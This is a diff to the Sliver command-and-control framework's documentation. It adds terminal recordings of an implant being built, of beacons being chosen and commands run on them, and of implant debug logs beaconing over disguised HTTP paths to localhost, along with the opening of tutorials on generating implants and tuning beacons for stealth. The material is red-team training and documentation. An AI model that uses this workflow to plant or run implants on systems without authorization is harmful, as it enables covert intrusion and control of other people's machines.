"\r\u001b[2K ⠴ Compiling, please wait ..."] +[24.01079, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[24.110942, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[24.211659, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[24.315586, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[24.416244, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[24.517638, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[24.618868, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[24.719696, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[24.820824, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[24.921219, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[25.024697, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[25.125472, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[25.227906, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[25.329545, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[25.431121, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[25.535746, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[25.637704, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[25.738396, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[25.839173, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[25.939818, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[26.040732, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[26.141458, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[26.242474, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[26.343401, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[26.445216, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[26.545778, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[26.646418, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[26.746909, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[26.847203, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[26.947977, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[27.052613, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[27.153745, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[27.255223, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[27.357774, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[27.458739, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[27.558862, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[27.630638, "o", "\r\u001b[2K"] +[27.631736, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mBuild completed in 14s\r\n"] +[27.644499, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mImplant saved to /root/MODERATE_SURFBOARD\r\n"] +[27.644786, "o", "\r\n"] +[27.653377, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[27.654061, "o", "\u001b[1 q\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[27.656989, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[9D\u001b[9C\u001b[272D\u001b[9C\u001b[?25h"] +[31.981685, "o", "\u001b[9D\u001b[9C\u001b[272D\u001b[0J"] +[31.983083, "o", "\r\u001b[2K\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mBeacon 4e1347cb MODERATE_SURFBOARD - 127.0.0.1:60634 (98df0494f659) - linux/amd64 - Thu, 02 May 2024 14:24:14 UTC\r\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[31.991032, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D"] +[31.991827, "o", "\u001b[1A\u001b[9D\u001b[9C\u001b[272D\u001b[9C\u001b[?25h"] +[33.285128, "o", "\u001b[?25l\u001b[272D"] +[33.287177, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[33.293558, "o", "u\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[33.293939, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[10D\u001b[9C\u001b[272D\u001b[10C\u001b[?25h"] +[33.417804, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[33.435433, "o", "us\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[33.438663, "o", "\u001b[0J\u001b[272D\u001b[1A\u001b[11D\u001b[9C\u001b[272D\u001b[11C\u001b[?25h"] +[33.469277, "o", "\u001b[?25l\u001b[272D"] +[33.471496, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[33.478651, "o", "\u001b[1m\u001b[32muse\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[12D\u001b[9C\u001b[272D\u001b[12C"] +[33.478999, "o", "\u001b[?25h"] +[33.561489, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[33.563865, "o", "\u001b[6n"] +[33.570806, "o", "\u001b[1m\u001b[32muse \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[33.573643, "o", "\u001b[272D\u001b[1A\u001b[13D\u001b[9C\u001b[272D\u001b[13C\u001b[?25h"] +[33.878787, "o", "\u001b[13D\u001b[9C\u001b[6n"] +[33.89625, "o", "\u001b[272D\u001b[13C\u001b[0J\u001b[272D\r\r\n"] +[33.898594, "o", "\u001b[0 q\r\n"] +[33.924706, "o", "\u001b7\u001b[?25l\u001b8\u001b[0G"] +[33.925994, "o", "\u001b[2K"] +[33.928627, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;1;36m> BEACON 1b50b27b BLOODY_PRODUCER 127.0.0.1:60624 98df0494f659 root linux/amd64\u001b[0m\r\n\u001b[0;39m BEACON 4e1347cb MODERATE_SURFBOARD 127.0.0.1:60634 98df0494f659 root linux/amd64\u001b[0m\r\n\u001b[0;39m BEACON bee527cb DIGITAL_SKIN 127.0.0.1:60610 98df0494f659 root linux/amd64\u001b[0m\r\n\u001b7\u001b[1A\u001b[0G\u001b[1A\u001b[0G\u001b[1A\u001b[0G"] +[35.316945, "o", "\u001b8"] +[35.317629, "o", "\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[35.321232, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;39m BEACON 1b50b27b BLOODY_PRODUCER 127.0.0.1:60624 98df0494f659 root linux/amd64\u001b[0m\r\n\u001b[0;1;36m> BEACON 4e1347cb MODERATE_SURFBOARD 127.0.0.1:60634 98df0494f659 root linux/amd64\u001b[0m\r\n\u001b[0;39m BEACON bee527cb DIGITAL_SKIN 127.0.0.1:60610 98df0494f659 root linux/amd64\u001b[0m\r\n\u001b7"] +[35.332932, "o", "\u001b[1A\u001b[0G\u001b[1A\u001b[0G"] +[35.818115, "o", "\u001b8\u001b[?25h\u001b8"] +[35.819976, "o", "\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m\u001b[0;36m BEACON 4e1347cb MODERATE_SURFBOARD 127.0.0.1:60634 98df0494f659 root linux/amd64\u001b[0m\r\n\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mActive beacon MODERATE_SURFBOARD (4e1347cb-5544-42ad-8176-11b709ed07ed)\r\n"] +[35.861014, "o", "\r\n"] +[35.874314, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > "] +[35.874462, "o", "\u001b[1 q\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > "] +[35.874695, "o", "\u001b[6n"] +[35.882556, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[35.882952, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[30D\u001b[30C\u001b[272D\u001b[30C\u001b[?25h"] +[37.049801, "o", "\u001b[?25l\u001b[272D"] +[37.054234, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > \u001b[6n"] +[37.081351, "o", "w\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[37.081911, "o", "\u001b[272D\u001b[1A\u001b[31D\u001b[30C\u001b[272D\u001b[31C\u001b[?25h"] +[37.096001, "o", "\u001b[?25l\u001b[272D"] +[37.097776, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > \u001b[6n"] +[37.101528, "o", "wh\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[37.102959, "o", "\u001b[272D\u001b[1A\u001b[32D\u001b[30C\u001b[272D\u001b[32C\u001b[?25h"] +[37.174672, "o", "\u001b[?25l\u001b[272D"] +[37.176441, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > \u001b[6n"] +[37.181298, "o", "who\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[37.181574, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[33D\u001b[30C\u001b[272D\u001b[33C\u001b[?25h"] +[37.331174, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > \u001b[6n"] +[37.341057, "o", "whoa\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[37.343357, "o", "\u001b[272D\u001b[1A\u001b[34D\u001b[30C\u001b[272D\u001b[34C\u001b[?25h"] +[37.442292, "o", "\u001b[?25l"] +[37.446397, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > \u001b[6n"] +[37.465938, "o", "whoam\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[35D\u001b[30C\u001b[272D\u001b[35C"] +[37.466232, "o", "\u001b[?25h"] +[37.504549, "o", "\u001b[?25l\u001b[272D"] +[37.505447, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > \u001b[6n"] +[37.51437, "o", "\u001b[1m\u001b[32mwhoami\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[36D\u001b[30C\u001b[272D\u001b[36C\u001b[?25h"] +[37.796903, "o", "\u001b[36D\u001b[30C\u001b[6n"] +[37.801267, "o", "\u001b[272D\u001b[36C\u001b[0J"] +[37.802279, "o", "\u001b[272D\r\r\n\u001b[0 q\r\n"] +[37.814246, "o", "Logon ID: "] +[37.815227, "o", "root\r\n\r\n"] +[37.832461, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > "] +[37.833266, "o", "\u001b[1 q\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > \u001b[6n"] +[37.837853, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D"] +[37.838595, "o", "\u001b[1A\u001b[30D\u001b[30C\u001b[272D\u001b[30C\u001b[?25h"] +[40.473897, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > \u001b[6n"] +[40.48804, "o", "b\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[40.489204, "o", "\u001b[272D\u001b[1A\u001b[31D\u001b[30C\u001b[272D\u001b[31C\u001b[?25h"] +[40.606317, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > \u001b[6n"] +[40.62038, "o", "ba\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[32D\u001b[30C\u001b[272D\u001b[32C\u001b[?25h"] +[40.660957, "o", "\u001b[?25l\u001b[272D"] +[40.661265, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > \u001b[6n"] +[40.667821, "o", "bac\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[40.668033, "o", "\u001b[272D\u001b[1A\u001b[33D\u001b[30C\u001b[272D\u001b[33C\u001b[?25h"] +[40.791227, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > \u001b[6n"] +[40.799243, "o", "back\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[40.800036, "o", "\u001b[0J\u001b[272D\u001b[1A\u001b[34D\u001b[30C\u001b[272D\u001b[34C\u001b[?25h"] +[40.993251, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > "] +[40.995587, "o", "\u001b[6n"] +[41.000745, "o", "backg\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[35D\u001b[30C\u001b[272D\u001b[35C\u001b[?25h"] +[41.06113, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > \u001b[6n"] +[41.077902, "o", "backgr\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A"] +[41.079305, "o", "\u001b[36D\u001b[30C\u001b[272D\u001b[36C\u001b[?25h"] +[41.118457, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > "] +[41.120423, "o", "\u001b[6n"] +[41.126434, "o", "backgro\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[37D\u001b[30C\u001b[272D"] +[41.127385, "o", "\u001b[37C\u001b[?25h"] +[41.169305, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > "] +[41.170952, "o", "\u001b[6n"] +[41.17744, "o", "backgrou\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[38D\u001b[30C\u001b[272D"] +[41.177934, "o", "\u001b[38C\u001b[?25h"] +[41.262733, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > "] +[41.266163, "o", "\u001b[6n"] +[41.273687, "o", "backgroun\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[41.274231, "o", "\u001b[272D\u001b[1A\u001b[39D\u001b[30C\u001b[272D\u001b[39C\u001b[?25h"] +[41.439819, "o", "\u001b[?25l\u001b[272D"] +[41.450008, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (MODERATE_SURFBOARD)\u001b[0m > \u001b[6n"] +[41.460762, "o", "\u001b[1m\u001b[32mbackground\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[41.461094, "o", "\u001b[272D\u001b[1A\u001b[40D\u001b[30C\u001b[272D\u001b[40C\u001b[?25h"] +[42.113141, "o", "\u001b[40D\u001b[30C\u001b[6n"] +[42.131751, "o", "\u001b[272D\u001b[40C\u001b[0J\u001b[272D\r\r\n"] +[42.132295, "o", "\u001b[0 q\r\n"] +[42.160131, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mBackground ...\r\n\r\n"] +[42.171577, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[42.172151, "o", "\u001b[1 q\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[42.177026, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D"] +[42.178208, "o", "\u001b[1A\u001b[9D\u001b[9C\u001b[272D\u001b[9C\u001b[?25h"] +[42.564114, "o", "\u001b[?25l"] +[42.567051, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[42.576669, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D"] +[42.577649, "o", "\u001b[1A\u001b[10D\u001b[9C\u001b[272D\u001b[10C\u001b[?25h"] +[42.775806, "o", "\u001b[?25l"] +[42.780983, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[42.788863, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[42.792037, "o", "\u001b[272D\u001b[1A\u001b[11D\u001b[9C\u001b[272D\u001b[11C\u001b[?25h"] +[42.932546, "o", "\u001b[?25l"] +[42.934873, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[42.940362, "o", "exi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A"] +[42.940862, "o", "\u001b[12D\u001b[9C\u001b[272D\u001b[12C\u001b[?25h"] +[43.072372, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[43.080373, "o", "\u001b[6n"] +[43.095139, "o", "\u001b[1m\u001b[32mexit\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[13D\u001b[9C\u001b[272D"] +[43.095323, "o", "\u001b[13C\u001b[?25h"] +[43.314122, "o", "\u001b[13D\u001b[9C\u001b[6n"] +[43.318756, "o", "\u001b[272D\u001b[13C\u001b[0J\u001b[272D\r\r\n"] +[43.320795, "o", "\u001b[0 q\r\n"] +[43.335732, "o", "Exiting...\r\n"] +[43.371863, "o", "# "] +[44.165801, "o", "\r\n"] diff --git a/docs/sliver-docs/public/asciinema/implant_debug_logs.cast b/docs/sliver-docs/public/asciinema/implant_debug_logs.cast new file mode 100644 index 0000000000..3a2cf6032c --- /dev/null +++ b/docs/sliver-docs/public/asciinema/implant_debug_logs.cast @@ -0,0 +1,43 @@ +{"version": 2, "width": 272, "height": 61, "timestamp": 1714660090, "env": {"SHELL": null, "TERM": "xterm"}} +[0.033058, "o", "# "] +[5.520586, "o", "/root/MODERATE_SURFBOARD"] +[6.245898, "o", "\r\n"] +[6.397188, "o", "2024/05/02 14:28:16 sliver.go:92: Hello my name is MODERATE_SURFBOARD\r\n"] +[6.397997, "o", "2024/05/02 14:28:16 limits.go:58: Limit checks completed\r\n2024/05/02 14:28:16 sliver.go:109: Running in Beacon mode with ID: 7cb11e89-2186-4e68-a09e-afe1872ae461\r\n2024/05/02 14:28:16 beacon.go:101: Starting beacon loop ...\r\n2024/05/02 14:28:16 transports.go:41: Starting c2 url generator () ...\r\n"] +[6.399539, "o", "2024/05/02 14:28:16 transports.go:104: Return generator: (chan *url.URL)(0xc0000d8600)\r\n"] +[6.401176, "o", "2024/05/02 14:28:16 beacon.go:117: Recv from c2 generator ...\r\n"] +[6.402627, "o", "2024/05/02 14:28:16 transports.go:92: Yield c2 uri = 'https://localhost'\r\n"] +[6.403338, "o", "2024/05/02 14:28:16 transports.go:92: Yield c2 uri = 'https://localhost'\r\n"] +[6.404033, "o", "2024/05/02 14:28:16 beacon.go:121: Next CC = https://localhost\r\n2024/05/02 14:28:16 beacon.go:167: Beaconing -> https://localhost\r\n"] +[6.405383, "o", "2024/05/02 14:28:16 beacon.go:121: Next CC = https://localhost\r\n2024/05/02 14:28:16 beacon.go:167: Beaconing -> https://localhost\r\n"] +[6.40654, "o", "2024/05/02 14:28:16 transports.go:92: Yield c2 uri = 'https://localhost'\r\n"] +[6.407194, "o", "2024/05/02 14:28:16 sliver.go:118: Next beacon = &{0xa0db40 0xa123e0 0xa0da20 0xa0da80 0xa12400 0xa0d9c0 https://localhost }\r\n"] +[6.43392, "o", "2024/05/02 14:28:16 httpclient.go:873: [http] segments = [rails log], filename = 422, ext = erb\r\n"] +[6.436322, "o", "2024/05/02 14:28:16 httpclient.go:354: [http] POST -> https://localhost/rails/log/422.cgi?j=1931v04942015 (266 bytes)\r\n"] +[6.463922, "o", "2024/05/02 14:28:16 httpclient.go:360: [http] http response error: Post \"https://localhost/rails/log/422.cgi?j=1931v04942015\": dial tcp 127.0.0.1:443: connect: connection refused\r\n"] +[6.472938, "o", "2024/05/02 14:28:16 httpclient.go:873: [http] segments = [vendor rails stylesheets], filename = jquery, ext = erb\r\n"] +[6.473208, "o", "2024/05/02 14:28:16 httpclient.go:354: [http] POST -> http://localhost/vendor/rails/stylesheets/jquery.cgi?j=u339121544924 (266 bytes)\r\n"] +[6.57564, "o", "2024/05/02 14:28:17 httpclient.go:403: [http] New session id: 70f17317dfc0a6ede97cc068544a22c6\r\n"] +[6.57626, "o", "2024/05/02 14:28:17 sliver.go:171: Registering beacon with server\r\n"] +[6.576727, "o", "2024/05/02 14:28:17 beacon.go:85: Interval: 60000000000 Jitter: 30000000000\r\n"] +[6.577308, "o", "2024/05/02 14:28:17 beacon.go:93: Duration: 1m22.112596514s\r\n"] +[6.579126, "o", "2024/05/02 14:28:17 uuid.go:44: Generating host UUID from hardware addresses ...\r\n"] +[6.581858, "o", "2024/05/02 14:28:17 sliver.go:582: Host Uuid: 3424b72e-e104-e99b-e183-dc60a7b751a0\r\n"] +[6.582597, "o", "2024/05/02 14:28:17 beacon.go:85: Interval: 60000000000 Jitter: 30000000000\r\n"] +[6.582843, "o", "2024/05/02 14:28:17 beacon.go:93: Duration: 1m7.519559765s\r\n"] +[6.59287, "o", "2024/05/02 14:28:17 httpclient.go:873: [http] segments = [vendor stylesheets rails], filename = jquery, ext = erb\r\n"] +[6.599451, "o", "2024/05/02 14:28:17 httpclient.go:498: [http] POST -> http://localhost/vendor/stylesheets/rails/jquery.erb?s=434x5691074e28 (302 bytes)\r\n"] +[6.661566, "o", "2024/05/02 14:28:17 httpclient.go:504: [http] POST request completed\r\n"] +[7.668978, "o", "2024/05/02 14:28:18 beacon.go:85: Interval: 60000000000 Jitter: 30000000000\r\n"] +[7.681551, "o", "2024/05/02 14:28:18 beacon.go:93: Duration: 1m24.64544484s\r\n2024/05/02 14:28:18 sliver.go:241: [beacon] sending check in ...\r\n2024/05/02 14:28:18 beacon.go:85: Interval: 60000000000 Jitter: 30000000000\r\n2024/05/02 14:28:18 beacon.go:93: Duration: 1m25.407017746s\r\n"] +[7.695718, "o", "2024/05/02 14:28:18 sliver.go:212: [beacon] sleep until 2024-05-02 14:29:42.825056298 +0000 UTC m=+86.004925590\r\n"] +[7.700968, "o", "2024/05/02 14:28:18 httpclient.go:873: [http] segments = [vendor log log], filename = jquery, ext = erb\r\n"] +[7.701908, "o", "2024/05/02 14:28:18 httpclient.go:498: [http] POST -> http://localhost/vendor/log/log/jquery.erb?v=52y9404190832 (100 bytes)\r\n"] +[7.778664, "o", "2024/05/02 14:28:18 httpclient.go:504: [http] POST request completed\r\n2024/05/02 14:28:18 sliver.go:254: [beacon] recv task(s) ...\r\n"] +[7.778861, "o", "2024/05/02 14:28:18 httpclient.go:873: [http] segments = [vendor vendor stylesheets vendor], filename = sidekiq, ext = rdoc\r\n"] +[7.779721, "o", "2024/05/02 14:28:18 httpclient.go:421: [http] GET -> http://localhost/vendor/vendor/stylesheets/vendor/sidekiq.rdoc?p=352795839974\r\n"] +[7.82062, "o", "2024/05/02 14:28:18 httpclient.go:304: Cancelling poll context\r\n"] +[7.824031, "o", "2024/05/02 14:28:18 sliver.go:279: [beacon] received 0 task(s) from server\r\n2024/05/02 14:28:18 sliver.go:235: [beacon] closing ...\r\n"] +[11.707654, "o", "^C"] +[11.739123, "o", "\r\n# "] +[12.871622, "o", "\r\n"] diff --git a/docs/sliver-docs/public/tutorials.json b/docs/sliver-docs/public/tutorials.json index 94e6bec869..10b222370f 100644 --- a/docs/sliver-docs/public/tutorials.json +++ b/docs/sliver-docs/public/tutorials.json @@ -1 +1 @@ -{"tutorials":[{"name":"1 - Getting Started","content":"This course will use the latest Sliver build, you can download it from [insert local web server].\n\n`sliver-server` is the binary you want to use to run the Sliver C2 server, `sliver-client` is solely a client to connect to a Sliver C2 server. Sliver server also acts as a client on its own, so you don’t necessarily run sliver server and client separately.\n\nFirst time running Sliver will take a couple seconds as its retrieving its dependencies, consecutive executions will be much faster. Go ahead and launch the `sliver-server`.\n\n```asciinema\n{\"src\": \"/asciinema/startup.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nLet's take a couple minutes to discuss what Sliver actually is and how its setup.\n\n![Alt text](/images/Architecture.png)\n\nNow that Sliver is running, lets generate and execute your first implant to try out some of the basic features of Sliver, for now we’re going to run everything on the local host.\n\nHere's what we're going to do: \n* Generate your implant using the `generate` command as shown below.\n* Start HTTP listener on port 80\n* Execute implant in a separate terminal\n\n```asciinema\n{\"src\": \"/asciinema/first-implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nNow let’s select our implant and run our first command using the `use` command.\n\n```bash\n[server] sliver > use\n? Select a session or beacon: \nSESSION 1884a365 RELATED_EARDRUM [::1]:49153 test.local tester darwin/amd64\n[*] Active session RELATED_EARDRUM (1884a365-085f-4506-b28e-80c481730fd0)\n\n[server] sliver (RELATED_EARDRUM) > pwd\n\n[*] /Users/tester/tools\n```\n\nOnce you have reached this point, go ahead and explore some of the commands listed below. In each case first checkout the commands help using the **`-h`** flag then try it out!\n\n```bash\nExploring and interacting with the filesystem\n\nFilesystem\n cat Dump file to stdout\n cd Change directory\n cp Copy a file\n download Download a file\n grep Search for strings that match a regex within a file or directory\n head Grab the first number of bytes or lines from a file\n ls List current directory\n memfiles List current memfiles\n mkdir Make a directory\n mount Get information on mounted filesystems\n mv Move or rename a file\n pwd Print working directory\n rm Remove a file or directory\n tail Grab the last number of bytes or lines from a file\n upload Upload a file\n```\n\n```asciinema\n{\"src\": \"/asciinema/filesystem.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nGetting some environmental information\n```bash\nInfo\n env List environment variables\n getgid Get session process GID\n getpid Get session pid\n getuid Get session process UID\n info Get session info\n ping Send round trip message to implant (does not use ICMP)\n screenshot Take a screenshot\n whoami Get session user execution context\n```\nExecute a binary\n\n```asciinema\n{\"src\": \"/asciinema/execute.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nRunning an interactive shell\n\n```asciinema\n{\"src\": \"/asciinema/shell.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```"},{"name":"2 - Beacons vs Sessions","content":"# Beacons vs Sessions\n\nSliver implants support two types of connections, sessions and beacons.\n\nSessions use long-poling connections, which means they use a single TCP connection which is constantly open. Beacons on the other hand call back periodically, and will sleep when not active which can help keep their presence hidden.\n\nTypically during an engagement you will want to deploy a beacon on the target system, and switch to a session while doing more active enumeration activities.\n\nLet’s start with generating and deploying a beacon using `http`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_generation.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nYou can see the beacon callback times either in the `info` command or using `beacons watch`.\n\n```bash\n[server] sliver > beacons watch\n\n ID Name Transport Username Operating System Last Check-In Next Check-In\n========== =============== =========== ================= ================== =============== ===============\n 942c647c TIRED_GIRAFFE http(s) tester darwin/amd64 52s 12s\n\n```\n\nBeacon callback times and jitter can be set either during generation or on the fly using the `reconfig` command.\n\nThe example below sets the callback time to 5s with a 1s jitter.\n\n```bash\n[server] sliver (TIRED_GIRAFFE) > reconfig -i 5s -j 1s\n\n[*] Tasked beacon TIRED_GIRAFFE 